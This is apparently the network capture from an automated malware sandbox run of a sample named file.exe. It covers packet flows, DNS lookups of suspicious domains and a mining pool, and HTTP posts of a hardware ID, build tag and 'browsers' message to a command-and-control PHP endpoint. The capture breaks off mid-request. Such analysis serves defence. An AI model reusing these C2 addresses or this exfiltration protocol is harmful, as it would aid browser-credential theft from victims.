Dec 8, 2024 19:52:41.110481024 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.110582113 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.110631943 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.111279964 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.111330986 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.111357927 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.111402988 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.292862892 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.292973995 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.293061972 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.293255091 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.293296099 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.293514967 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.293561935 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.293670893 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.293719053 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.294388056 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.294445038 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.294527054 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.294573069 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.295198917 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.295666933 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.295718908 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.296250105 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.296303988 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.296328068 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.296380043 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.297064066 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.297118902 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.297293901 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.297343016 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.298074007 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.298125029 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.298335075 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.298377037 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.298815012 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.298825979 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.298882008 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.299681902 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.299745083 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.299810886 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.299854994 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.300777912 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.300826073 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.300863028 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.300911903 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.301433086 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.301482916 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.301500082 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.301537991 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.302272081 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.302319050 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.302380085 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.302423000 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.303162098 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.303289890 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.303344965 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.304055929 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.304099083 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.304177046 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.304220915 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.304939985 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.304991961 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.305047035 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.305090904 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.305860043 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.305910110 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.305989027 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.306035995 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.306701899 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.306812048 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.306863070 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.307585955 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.307636023 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.307641983 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.307678938 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.308528900 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.308576107 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.308732033 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.308773994 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.309362888 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.309411049 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.309489012 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.309533119 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.310333967 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.310431004 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.310517073 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.311427116 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.311477900 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.311511040 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.311552048 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.312365055 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.312419891 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.312498093 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.312550068 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.313357115 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.313404083 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.313411951 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.313446999 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.314327955 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.314378023 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.314460993 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.314508915 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.315103054 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.315243959 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.315291882 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:41.315808058 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:41.315851927 CET	49757	80	192.168.2.4	185.215.113.16

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 8, 2024 19:52:10.942382097 CET	192.168.2.4	1.1.1.1	0xdee9	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:52:10.942563057 CET	192.168.2.4	1.1.1.1	0xdf3	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 8, 2024 19:52:18.127495050 CET	192.168.2.4	1.1.1.1	0x86d	Standard query (0)	ogs.google.com	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:52:18.127662897 CET	192.168.2.4	1.1.1.1	0x18e6	Standard query (0)	ogs.google.com	65	IN (0x0001)	false
Dec 8, 2024 19:52:18.248297930 CET	192.168.2.4	1.1.1.1	0x7a25	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:52:18.249147892 CET	192.168.2.4	1.1.1.1	0x8ffc	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Dec 8, 2024 19:53:35.255007982 CET	192.168.2.4	1.1.1.1	0x1c07	Standard query (0)	woo097878781.win	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:53:41.298141003 CET	192.168.2.4	1.1.1.1	0xaf1d	Standard query (0)	atten-supporse.biz	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:53:59.308541059 CET	192.168.2.4	1.1.1.1	0xce77	Standard query (0)	pool.hashvault.pro	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:10.282727957 CET	192.168.2.4	1.1.1.1	0x44c3	Standard query (0)	support.mozilla.org	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:10.428251028 CET	192.168.2.4	1.1.1.1	0xf19	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:10.572263002 CET	192.168.2.4	1.1.1.1	0x793b	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 8, 2024 19:54:10.727680922 CET	192.168.2.4	1.1.1.1	0x66db	Standard query (0)	www.youtube.com	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:10.727900982 CET	192.168.2.4	1.1.1.1	0x175a	Standard query (0)	www.facebook.com	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:10.728065014 CET	192.168.2.4	1.1.1.1	0xe004	Standard query (0)	www.wikipedia.org	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:10.867536068 CET	192.168.2.4	1.1.1.1	0xd7c1	Standard query (0)	star-mini.c10r.facebook.com	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:10.867536068 CET	192.168.2.4	1.1.1.1	0x4714	Standard query (0)	youtube-ui.l.google.com	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:10.867929935 CET	192.168.2.4	1.1.1.1	0x2bc	Standard query (0)	dyna.wikimedia.org	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:11.005171061 CET	192.168.2.4	1.1.1.1	0x1f16	Standard query (0)	star-mini.c10r.facebook.com	28	IN (0x0001)	false
Dec 8, 2024 19:54:11.005568027 CET	192.168.2.4	1.1.1.1	0xc22b	Standard query (0)	youtube-ui.l.google.com	28	IN (0x0001)	false
Dec 8, 2024 19:54:11.006067038 CET	192.168.2.4	1.1.1.1	0xdb6d	Standard query (0)	dyna.wikimedia.org	28	IN (0x0001)	false
Dec 8, 2024 19:54:11.144398928 CET	192.168.2.4	1.1.1.1	0x202	Standard query (0)	www.reddit.com	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:11.144962072 CET	192.168.2.4	1.1.1.1	0xa5d1	Standard query (0)	twitter.com	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:11.284327984 CET	192.168.2.4	1.1.1.1	0x7eac	Standard query (0)	twitter.com	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:11.285370111 CET	192.168.2.4	1.1.1.1	0xfa05	Standard query (0)	reddit.map.fastly.net	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:11.423603058 CET	192.168.2.4	1.1.1.1	0x3811	Standard query (0)	twitter.com	28	IN (0x0001)	false
Dec 8, 2024 19:54:11.426012993 CET	192.168.2.4	1.1.1.1	0xf63d	Standard query (0)	reddit.map.fastly.net	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 8, 2024 19:52:11.080226898 CET	1.1.1.1	192.168.2.4	0xdee9	No error (0)	www.google.com		216.58.208.228	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:52:11.081762075 CET	1.1.1.1	192.168.2.4	0xdf3	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 8, 2024 19:52:18.265888929 CET	1.1.1.1	192.168.2.4	0x86d	No error (0)	ogs.google.com	www3.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 8, 2024 19:52:18.265888929 CET	1.1.1.1	192.168.2.4	0x86d	No error (0)	www3.l.google.com		142.250.181.142	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:52:18.267282963 CET	1.1.1.1	192.168.2.4	0x18e6	No error (0)	ogs.google.com	www3.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 8, 2024 19:52:18.386519909 CET	1.1.1.1	192.168.2.4	0x7a25	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 8, 2024 19:52:18.386519909 CET	1.1.1.1	192.168.2.4	0x7a25	No error (0)	plus.l.google.com		172.217.17.78	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:52:18.387170076 CET	1.1.1.1	192.168.2.4	0x8ffc	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 8, 2024 19:53:35.871330023 CET	1.1.1.1	192.168.2.4	0x1c07	No error (0)	woo097878781.win		154.216.20.243	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:53:41.435776949 CET	1.1.1.1	192.168.2.4	0xaf1d	No error (0)	atten-supporse.biz		104.21.16.9	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:53:41.435776949 CET	1.1.1.1	192.168.2.4	0xaf1d	No error (0)	atten-supporse.biz		172.67.165.166	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:53:59.635044098 CET	1.1.1.1	192.168.2.4	0xce77	No error (0)	pool.hashvault.pro		37.203.243.102	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:53:59.635044098 CET	1.1.1.1	192.168.2.4	0xce77	No error (0)	pool.hashvault.pro		5.188.137.200	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:10.421648026 CET	1.1.1.1	192.168.2.4	0x44c3	No error (0)	support.mozilla.org	prod.sumo.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 8, 2024 19:54:10.421648026 CET	1.1.1.1	192.168.2.4	0x44c3	No error (0)	prod.sumo.prod.webservices.mozgcp.net	us-west1.prod.sumo.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 8, 2024 19:54:10.421648026 CET	1.1.1.1	192.168.2.4	0x44c3	No error (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net		34.149.128.2	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:10.565936089 CET	1.1.1.1	192.168.2.4	0xf19	No error (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net		34.149.128.2	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:10.866111040 CET	1.1.1.1	192.168.2.4	0x175a	No error (0)	www.facebook.com	star-mini.c10r.facebook.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 8, 2024 19:54:10.866111040 CET	1.1.1.1	192.168.2.4	0x175a	No error (0)	star-mini.c10r.facebook.com		157.240.195.35	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:10.866126060 CET	1.1.1.1	192.168.2.4	0x66db	No error (0)	www.youtube.com	youtube-ui.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 8, 2024 19:54:10.866126060 CET	1.1.1.1	192.168.2.4	0x66db	No error (0)	youtube-ui.l.google.com		172.217.17.46	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:10.866126060 CET	1.1.1.1	192.168.2.4	0x66db	No error (0)	youtube-ui.l.google.com		172.217.19.206	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:10.866126060 CET	1.1.1.1	192.168.2.4	0x66db	No error (0)	youtube-ui.l.google.com		216.58.208.238	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:10.866126060 CET	1.1.1.1	192.168.2.4	0x66db	No error (0)	youtube-ui.l.google.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:10.866126060 CET	1.1.1.1	192.168.2.4	0x66db	No error (0)	youtube-ui.l.google.com		142.250.181.110	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:10.866126060 CET	1.1.1.1	192.168.2.4	0x66db	No error (0)	youtube-ui.l.google.com		142.250.181.142	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:10.866126060 CET	1.1.1.1	192.168.2.4	0x66db	No error (0)	youtube-ui.l.google.com		172.217.17.78	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:10.866126060 CET	1.1.1.1	192.168.2.4	0x66db	No error (0)	youtube-ui.l.google.com		172.217.19.238	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:10.866126060 CET	1.1.1.1	192.168.2.4	0x66db	No error (0)	youtube-ui.l.google.com		142.250.181.46	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:10.866734982 CET	1.1.1.1	192.168.2.4	0xe004	No error (0)	www.wikipedia.org	dyna.wikimedia.org		CNAME (Canonical name)	IN (0x0001)	false
Dec 8, 2024 19:54:10.866734982 CET	1.1.1.1	192.168.2.4	0xe004	No error (0)	dyna.wikimedia.org		185.15.58.224	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:11.004626989 CET	1.1.1.1	192.168.2.4	0xd7c1	No error (0)	star-mini.c10r.facebook.com		157.240.196.35	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:11.004844904 CET	1.1.1.1	192.168.2.4	0x4714	No error (0)	youtube-ui.l.google.com		142.250.181.142	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:11.004844904 CET	1.1.1.1	192.168.2.4	0x4714	No error (0)	youtube-ui.l.google.com		172.217.19.206	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:11.004844904 CET	1.1.1.1	192.168.2.4	0x4714	No error (0)	youtube-ui.l.google.com		216.58.208.238	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:11.004844904 CET	1.1.1.1	192.168.2.4	0x4714	No error (0)	youtube-ui.l.google.com		172.217.17.46	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:11.004844904 CET	1.1.1.1	192.168.2.4	0x4714	No error (0)	youtube-ui.l.google.com		172.217.19.238	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:11.004844904 CET	1.1.1.1	192.168.2.4	0x4714	No error (0)	youtube-ui.l.google.com		172.217.17.78	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:11.004844904 CET	1.1.1.1	192.168.2.4	0x4714	No error (0)	youtube-ui.l.google.com		142.250.181.110	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:11.004844904 CET	1.1.1.1	192.168.2.4	0x4714	No error (0)	youtube-ui.l.google.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:11.004844904 CET	1.1.1.1	192.168.2.4	0x4714	No error (0)	youtube-ui.l.google.com		142.250.181.46	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:11.005755901 CET	1.1.1.1	192.168.2.4	0x2bc	No error (0)	dyna.wikimedia.org		185.15.58.224	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:11.143743992 CET	1.1.1.1	192.168.2.4	0x1f16	No error (0)	star-mini.c10r.facebook.com			28	IN (0x0001)	false
Dec 8, 2024 19:54:11.144201040 CET	1.1.1.1	192.168.2.4	0xc22b	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Dec 8, 2024 19:54:11.144201040 CET	1.1.1.1	192.168.2.4	0xc22b	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Dec 8, 2024 19:54:11.144201040 CET	1.1.1.1	192.168.2.4	0xc22b	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Dec 8, 2024 19:54:11.144201040 CET	1.1.1.1	192.168.2.4	0xc22b	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Dec 8, 2024 19:54:11.144498110 CET	1.1.1.1	192.168.2.4	0xdb6d	No error (0)	dyna.wikimedia.org			28	IN (0x0001)	false
Dec 8, 2024 19:54:11.283500910 CET	1.1.1.1	192.168.2.4	0xa5d1	No error (0)	twitter.com		104.244.42.1	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:11.283947945 CET	1.1.1.1	192.168.2.4	0x202	No error (0)	www.reddit.com	reddit.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 8, 2024 19:54:11.283947945 CET	1.1.1.1	192.168.2.4	0x202	No error (0)	reddit.map.fastly.net		151.101.1.140	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:11.283947945 CET	1.1.1.1	192.168.2.4	0x202	No error (0)	reddit.map.fastly.net		151.101.129.140	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:11.283947945 CET	1.1.1.1	192.168.2.4	0x202	No error (0)	reddit.map.fastly.net		151.101.193.140	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:11.283947945 CET	1.1.1.1	192.168.2.4	0x202	No error (0)	reddit.map.fastly.net		151.101.65.140	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:11.422122002 CET	1.1.1.1	192.168.2.4	0x7eac	No error (0)	twitter.com		104.244.42.1	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:11.423435926 CET	1.1.1.1	192.168.2.4	0xfa05	No error (0)	reddit.map.fastly.net		151.101.1.140	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:11.423435926 CET	1.1.1.1	192.168.2.4	0xfa05	No error (0)	reddit.map.fastly.net		151.101.129.140	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:11.423435926 CET	1.1.1.1	192.168.2.4	0xfa05	No error (0)	reddit.map.fastly.net		151.101.65.140	A (IP address)	IN (0x0001)	false
Dec 8, 2024 19:54:11.423435926 CET	1.1.1.1	192.168.2.4	0xfa05	No error (0)	reddit.map.fastly.net		151.101.193.140	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	185.215.113.206	80	7396	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:52:02.131928921 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 8, 2024 19:52:03.456253052 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:52:03 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 8, 2024 19:52:03.458870888 CET	412	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKFIJJEGHDAEBGCAKJKF Host: 185.215.113.206 Content-Length: 210 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 36 36 42 33 32 30 39 44 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 2d 2d 0d 0a Data Ascii: ------BKFIJJEGHDAEBGCAKJKFContent-Disposition: form-data; name="hwid"3266B3209D0F807656615------BKFIJJEGHDAEBGCAKJKFContent-Disposition: form-data; name="build"stok------BKFIJJEGHDAEBGCAKJKF--
Dec 8, 2024 19:52:03.930253029 CET	407	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:52:03 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 32 49 7a 4f 44 55 31 4f 57 4d 7a 4e 54 5a 6a 5a 6a 41 79 4d 6a 6b 7a 5a 57 46 68 59 6a 51 77 4f 47 59 31 4d 44 45 32 59 7a 55 79 59 6a 49 77 4e 6a 4d 31 59 7a 67 31 5a 6a 6b 79 5a 6a 4a 6b 4e 57 4d 7a 4d 44 63 7a 4e 32 5a 69 59 6a 63 32 59 6d 55 79 4d 6a 4e 6d 5a 57 4d 33 4f 44 5a 6c 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: Y2IzODU1OWMzNTZjZjAyMjkzZWFhYjQwOGY1MDE2YzUyYjIwNjM1Yzg1ZjkyZjJkNWMzMDczN2ZiYjc2YmUyMjNmZWM3ODZlfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Dec 8, 2024 19:52:03.931476116 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGDGIIJJECFIDHJJKKFC Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 33 38 35 35 39 63 33 35 36 63 66 30 32 32 39 33 65 61 61 62 34 30 38 66 35 30 31 36 63 35 32 62 32 30 36 33 35 63 38 35 66 39 32 66 32 64 35 63 33 30 37 33 37 66 62 62 37 36 62 65 32 32 33 66 65 63 37 38 36 65 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 2d 2d 0d 0a Data Ascii: ------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; 